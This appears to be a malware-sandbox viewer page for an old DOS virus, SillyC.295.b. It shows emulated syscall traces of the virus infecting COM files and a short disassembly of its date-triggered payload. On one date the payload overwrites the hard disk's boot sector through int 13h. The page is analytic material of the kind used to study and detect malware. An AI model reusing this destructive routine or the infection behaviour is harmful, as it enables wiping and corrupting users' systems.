Sample viewer

vx.netlux.org/Virus.DOS.SillyC.295.b

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:03:04.074776733Z 42 PC: 12a45 | Get date
0x12a45: cmp dh, 3
0x12a48: jne 0x12a5d
0x12a4a: mov ah, 3
0x12a4c: mov dx, 0x80
0x12a4f: mov cx, 1
0x12a52: mov al, 1
0x12a54: push cs
0x12a55: pop es
0x12a56: mov bx, 0x11b
0x12a59: int 0x13
0x12a5b: int 0x18
0x12a5d: mov ah, 0x4a
0x12a5f: mov bx, word ptr cs:[0x200]
0x12a64: add bx, 0x20e
0x12a68: push cx
0x12a69: mov cl, 4
0x12a6b: shr bx, cl
0x12a6d: inc bx
0x12a6e: pop cx
0x12a6f: int 0x21
2018-12-17T23:03:04.079198983Z 74 PC: 12a71 | Reallocate memory
2018-12-17T23:03:04.080548322Z 72 PC: 12a79 | Allocate memory
2018-12-17T23:03:04.082024174Z 47 PC: 12a7f | Get disk transfer address
2018-12-17T23:03:04.084165952Z 26 PC: 12a8c | Set disk transfer address
2018-12-17T23:03:04.085644781Z 78 PC: 12a98 | Find first file
2018-12-17T23:03:04.091639795Z 67 PC: 12ad4 | Get or set file attributes
2018-12-17T23:03:04.109089027Z 61 PC: 12ad9 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:03:04.115506017Z 63 PC: 12ae7 | Read file or device (Read 295 bytes on handle 5)
2018-12-17T23:03:04.12183062Z 66 PC: 12af0 | Move file pointer
2018-12-17T23:03:04.123481444Z 64 PC: 12afc | Write file or device (Write 295 bytes on handle 5)
2018-12-17T23:03:04.126711602Z 66 PC: 12b0a | Move file pointer
2018-12-17T23:03:04.128140993Z 64 PC: 12b11 | Write file or device (Write 295 bytes on handle 5)
2018-12-17T23:03:04.135673445Z 87 PC: 12b1c | Get or set file date and time
2018-12-17T23:03:04.137770002Z 62 PC: 12b20 | Close file
2018-12-17T23:03:04.143262909Z 79 PC: 12b28 | Find next file
2018-12-17T23:03:04.145152955Z 79 PC: 12b28 | Find next file
2018-12-17T23:03:04.148188456Z 79 PC: 12b28 | Find next file
2018-12-17T23:03:04.151671434Z 79 PC: 12b28 | Find next file
2018-12-17T23:03:04.154297696Z 79 PC: 12b28 | Find next file
2018-12-17T23:03:04.158813487Z 67 PC: 12ad4 | Get or set file attributes
2018-12-17T23:03:04.168589894Z 61 PC: 12ad9 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:03:04.174821014Z 63 PC: 12ae7 | Read file or device (Read 295 bytes on handle 5)
2018-12-17T23:03:04.18164988Z 66 PC: 12af0 | Move file pointer
2018-12-17T23:03:04.183269736Z 64 PC: 12afc | Write file or device (Write 295 bytes on handle 5)
2018-12-17T23:03:04.185936073Z 66 PC: 12b0a | Move file pointer
2018-12-17T23:03:04.187921236Z 64 PC: 12b11 | Write file or device (Write 295 bytes on handle 5)
2018-12-17T23:03:04.195697395Z 87 PC: 12b1c | Get or set file date and time
2018-12-17T23:03:04.197536079Z 62 PC: 12b20 | Close file
2018-12-17T23:03:04.205493999Z 79 PC: 12b28 | Find next file
2018-12-17T23:03:04.208146674Z 79 PC: 12b28 | Find next file
2018-12-17T23:03:04.210658059Z 67 PC: 12ad4 | Get or set file attributes
2018-12-17T23:03:04.220423889Z 61 PC: 12ad9 | Open file (Filename = 'TEST.COM')
2018-12-17T23:03:04.227898591Z 63 PC: 12ae7 | Read file or device (Read 295 bytes on handle 5)
2018-12-17T23:03:04.230631506Z 66 PC: 12af0 | Move file pointer
2018-12-17T23:03:04.232195148Z 64 PC: 12afc | Write file or device (Write 295 bytes on handle 5)
2018-12-17T23:03:04.235329476Z 66 PC: 12b0a | Move file pointer
2018-12-17T23:03:04.236930939Z 64 PC: 12b11 | Write file or device (Write 295 bytes on handle 5)
2018-12-17T23:03:04.244822082Z 87 PC: 12b1c | Get or set file date and time
2018-12-17T23:03:04.247097634Z 62 PC: 12b20 | Close file
2018-12-17T23:03:04.254782715Z 79 PC: 12b28 | Find next file
2018-12-17T23:03:04.2573264Z 26 PC: 12b32 | Set disk transfer address
2018-12-17T23:03:04.259496289Z 73 PC: 133bd | Release memory
2018-12-17T23:03:04.262837379Z 77 PC: 11fe0 | Get program return code
2018-12-17T23:03:04.264170121Z 72 PC: 12174 | Allocate memory
2018-12-17T23:03:04.266756722Z 72 PC: 1218d | Allocate memory
2018-12-17T23:03:04.268557954Z 2 PC: 1268d | Character output (Char = '0d')
2018-12-17T23:03:04.270488388Z 2 PC: 1268d | Character output (Char = '0a')
2018-12-17T23:03:04.274951821Z 2 PC: 1268d | Character output (Char = '4d')
2018-12-17T23:03:04.277056975Z 2 PC: 1268d | Character output (Char = '65')
2018-12-17T23:03:04.279531061Z 2 PC: 1268d | Character output (Char = '6d')
2018-12-17T23:03:04.293917442Z 2 PC: 1268d | Character output (Char = '6f')
2018-12-17T23:03:04.295918738Z 2 PC: 1268d | Character output (Char = '72')
2018-12-17T23:03:04.298148977Z 2 PC: 1268d | Character output (Char = '79')
2018-12-17T23:03:04.301639838Z 2 PC: 1268d | Character output (Char = '20')
2018-12-17T23:03:04.303751951Z 2 PC: 1268d | Character output (Char = '61')
2018-12-17T23:03:04.305738567Z 2 PC: 1268d | Character output (Char = '6c')
2018-12-17T23:03:04.308881064Z 2 PC: 1268d | Character output (Char = '6c')
2018-12-17T23:03:04.312072463Z 2 PC: 1268d | Character output (Char = '6f')
2018-12-17T23:03:04.314275949Z 2 PC: 1268d | Character output (Char = '63')
2018-12-17T23:03:04.317257114Z 2 PC: 1268d | Character output (Char = '61')
2018-12-17T23:03:04.318863163Z 2 PC: 1268d | Character output (Char = '74')
2018-12-17T23:03:04.32039303Z 2 PC: 1268d | Character output (Char = '69')
2018-12-17T23:03:04.322557171Z 2 PC: 1268d | Character output (Char = '6f')
2018-12-17T23:03:04.324277302Z 2 PC: 1268d | Character output (Char = '6e')
2018-12-17T23:03:04.325753867Z 2 PC: 1268d | Character output (Char = '20')
2018-12-17T23:03:04.327779068Z 2 PC: 1268d | Character output (Char = '65')
2018-12-17T23:03:04.329393103Z 2 PC: 1268d | Character output (Char = '72')
2018-12-17T23:03:04.331008151Z 2 PC: 1268d | Character output (Char = '72')
2018-12-17T23:03:04.333249021Z 2 PC: 1268d | Character output (Char = '6f')
2018-12-17T23:03:04.334809291Z 2 PC: 1268d | Character output (Char = '72')
2018-12-17T23:03:04.336271487Z 2 PC: 1268d | Character output (Char = '0d')
2018-12-17T23:03:04.338350421Z 2 PC: 1268d | Character output (Char = '0a')
2018-12-17T23:03:04.340484498Z 2 PC: 1268d | Character output (Char = '43')
2018-12-17T23:03:04.341853407Z 2 PC: 1268d | Character output (Char = '61')
2018-12-17T23:03:04.343840167Z 2 PC: 1268d | Character output (Char = '6e')
2018-12-17T23:03:04.345253171Z 2 PC: 1268d | Character output (Char = '6e')
2018-12-17T23:03:04.347336089Z 2 PC: 1268d | Character output (Char = '6f')
2018-12-17T23:03:04.355977383Z 2 PC: 1268d | Character output (Char = '74')
2018-12-17T23:03:04.358005639Z 2 PC: 1268d | Character output (Char = '20')
2018-12-17T23:03:04.359739065Z 2 PC: 1268d | Character output (Char = '6c')
2018-12-17T23:03:04.361619765Z 2 PC: 1268d | Character output (Char = '6f')
2018-12-17T23:03:04.362969031Z 2 PC: 1268d | Character output (Char = '61')
2018-12-17T23:03:04.364935349Z 2 PC: 1268d | Character output (Char = '64')
2018-12-17T23:03:04.367292273Z 2 PC: 1268d | Character output (Char = '20')
2018-12-17T23:03:04.369210208Z 2 PC: 1268d | Character output (Char = '43')
2018-12-17T23:03:04.371062045Z 2 PC: 1268d | Character output (Char = '4f')
2018-12-17T23:03:04.373311412Z 2 PC: 1268d | Character output (Char = '4d')
2018-12-17T23:03:04.375222367Z 2 PC: 1268d | Character output (Char = '4d')
2018-12-17T23:03:04.377077048Z 2 PC: 1268d | Character output (Char = '41')
2018-12-17T23:03:04.379573179Z 2 PC: 1268d | Character output (Char = '4e')
2018-12-17T23:03:04.381545575Z 2 PC: 1268d | Character output (Char = '44')
2018-12-17T23:03:04.383418906Z 2 PC: 1268d | Character output (Char = '2c')
2018-12-17T23:03:04.385839832Z 2 PC: 1268d | Character output (Char = '20')
2018-12-17T23:03:04.387759458Z 2 PC: 1268d | Character output (Char = '73')
2018-12-17T23:03:04.389621735Z 2 PC: 1268d | Character output (Char = '79')
2018-12-17T23:03:04.39215726Z 2 PC: 1268d | Character output (Char = '73')
2018-12-17T23:03:04.394131115Z 2 PC: 1268d | Character output (Char = '74')
2018-12-17T23:03:04.39685086Z 2 PC: 1268d | Character output (Char = '65')
2018-12-17T23:03:04.399510989Z 2 PC: 1268d | Character output (Char = '6d')
2018-12-17T23:03:04.401849701Z 2 PC: 1268d | Character output (Char = '20')
2018-12-17T23:03:04.403722905Z 2 PC: 1268d | Character output (Char = '68')
2018-12-17T23:03:04.406709439Z 2 PC: 1268d | Character output (Char = '61')
2018-12-17T23:03:04.410444801Z 2 PC: 1268d | Character output (Char = '6c')
2018-12-17T23:03:04.412810852Z 2 PC: 1268d | Character output (Char = '74')
2018-12-17T23:03:04.416397514Z 2 PC: 1268d | Character output (Char = '65')
2018-12-17T23:03:04.418570399Z 2 PC: 1268d | Character output (Char = '64')
2018-12-17T23:03:04.420742125Z 2 PC: 1268d | Character output (Char = '0d')
2018-12-17T23:03:04.423489832Z 2 PC: 1268d | Character output (Char = '0a')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14427,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:41.280749477Z 42 PC: 12a45 | Get date
0x12a45: cmp dh, 3
0x12a48: jne 0x12a5d
0x12a4a: mov ah, 3
0x12a4c: mov dx, 0x80
0x12a4f: mov cx, 1
0x12a52: mov al, 1
0x12a54: push cs
0x12a55: pop es
0x12a56: mov bx, 0x11b
0x12a59: int 0x13
0x12a5b: int 0x18
0x12a5d: mov ah, 0x4a
0x12a5f: mov bx, word ptr cs:[0x200]
0x12a64: add bx, 0x20e
0x12a68: push cx
0x12a69: mov cl, 4
0x12a6b: shr bx, cl
0x12a6d: inc bx
0x12a6e: pop cx
0x12a6f: int 0x21
2018-12-25T12:40:41.283566994Z 74 PC: 12a71 | Reallocate memory
2018-12-25T12:40:41.284906151Z 72 PC: 12a79 | Allocate memory
2018-12-25T12:40:41.286377472Z 47 PC: 12a7f | Get disk transfer address
2018-12-25T12:40:41.287951228Z 26 PC: 12a8c | Set disk transfer address
2018-12-25T12:40:41.288973257Z 78 PC: 12a98 | Find first file
2018-12-25T12:40:41.294654762Z 67 PC: 12ad4 | Get or set file attributes
2018-12-25T12:40:41.313016181Z 61 PC: 12ad9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:40:41.319640644Z 63 PC: 12ae7 | Read file or device (Read 295 bytes on handle 5)
2018-12-25T12:40:41.325968728Z 66 PC: 12af0 | Move file pointer
2018-12-25T12:40:41.328287164Z 64 PC: 12afc | Write file or device (Write 295 bytes on handle 5)
2018-12-25T12:40:41.330886365Z 66 PC: 12b0a | Move file pointer
2018-12-25T12:40:41.332304934Z 64 PC: 12b11 | Write file or device (Write 295 bytes on handle 5)
2018-12-25T12:40:41.340908334Z 87 PC: 12b1c | Get or set file date and time
2018-12-25T12:40:41.342346786Z 62 PC: 12b20 | Close file
2018-12-25T12:40:41.350326411Z 79 PC: 12b28 | Find next file
2018-12-25T12:40:41.353316231Z 79 PC: 12b28 | Find next file (See above)
2018-12-25T12:40:41.356073403Z 79 PC: 12b28 | Find next file (See above)
2018-12-25T12:40:41.358456863Z 79 PC: 12b28 | Find next file (See above)
2018-12-25T12:40:41.360794484Z 79 PC: 12b28 | Find next file (See above)
2018-12-25T12:40:41.364059499Z 67 PC: 12ad4 | Get or set file attributes (See above)
2018-12-25T12:40:41.37469724Z 61 PC: 12ad9 | Open file (See above)
2018-12-25T12:40:41.388852558Z 63 PC: 12ae7 | Read file or device (See above)
2018-12-25T12:40:41.414843354Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:40:41.416523387Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:40:41.419582174Z 66 PC: 12b0a | Move file pointer (See above)
2018-12-25T12:40:41.422109659Z 64 PC: 12b11 | Write file or device (See above)
2018-12-25T12:40:41.430359231Z 87 PC: 12b1c | Get or set file date and time (See above)
2018-12-25T12:40:41.432220064Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:40:41.440911695Z 79 PC: 12b28 | Find next file (See above)
2018-12-25T12:40:41.443812592Z 79 PC: 12b28 | Find next file (See above)
2018-12-25T12:40:41.4465949Z 67 PC: 12ad4 | Get or set file attributes (See above)
2018-12-25T12:40:41.456797524Z 61 PC: 12ad9 | Open file (See above)
2018-12-25T12:40:41.463374953Z 63 PC: 12ae7 | Read file or device (See above)
2018-12-25T12:40:41.466173011Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:40:41.468674186Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:40:41.47184093Z 66 PC: 12b0a | Move file pointer (See above)
2018-12-25T12:40:41.473466282Z 64 PC: 12b11 | Write file or device (See above)
2018-12-25T12:40:41.482548859Z 87 PC: 12b1c | Get or set file date and time (See above)
2018-12-25T12:40:41.484306976Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:40:41.492263296Z 79 PC: 12b28 | Find next file (See above)
2018-12-25T12:40:41.494836123Z 26 PC: 12b32 | Set disk transfer address
2018-12-25T12:40:41.496823944Z 73 PC: 133bd | Release memory
2018-12-25T12:40:41.500172927Z 77 PC: 11fe0 | Get program return code
2018-12-25T12:40:41.501542901Z 72 PC: 12174 | Allocate memory
2018-12-25T12:40:41.505149535Z 72 PC: 1218d | Allocate memory
2018-12-25T12:40:41.507483026Z 2 PC: 1268d | Character output (Char = '0d')
2018-12-25T12:40:41.509349751Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.521807726Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.524051723Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.526405213Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.529542071Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.531830649Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.534066363Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.536891176Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.539686028Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.541843758Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.545417347Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.547657251Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.54992271Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.566443882Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.568578362Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.570659246Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.573734139Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.575751297Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.577727082Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.580764063Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.583242869Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.585563989Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.592941208Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.595004177Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.597436498Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.600339346Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.603907734Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.605949027Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.608726426Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.611953372Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.613932477Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.617544435Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.619757428Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.621773662Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.625510654Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.628969651Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.631044067Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.634158947Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.636654712Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.638879575Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.64157796Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.643830038Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.652690107Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.655798174Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.657881279Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.659934884Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.662166044Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.664824567Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.666812672Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.668858672Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.671729017Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.673689871Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.67577299Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.678683181Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.68072769Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.682748225Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.685990218Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.687976031Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.690789948Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.694076039Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.696455043Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:40:41.69868504Z 2 PC: 1268d | Character output (See above)

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14427,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:42.240010272Z 42 PC: 12a45 | Get date
0x12a45: cmp dh, 3
0x12a48: jne 0x12a5d
0x12a4a: mov ah, 3
0x12a4c: mov dx, 0x80
0x12a4f: mov cx, 1
0x12a52: mov al, 1
0x12a54: push cs
0x12a55: pop es
0x12a56: mov bx, 0x11b
0x12a59: int 0x13
0x12a5b: int 0x18
0x12a5d: mov ah, 0x4a
0x12a5f: mov bx, word ptr cs:[0x200]
0x12a64: add bx, 0x20e
0x12a68: push cx
0x12a69: mov cl, 4
0x12a6b: shr bx, cl
0x12a6d: inc bx
0x12a6e: pop cx
0x12a6f: int 0x21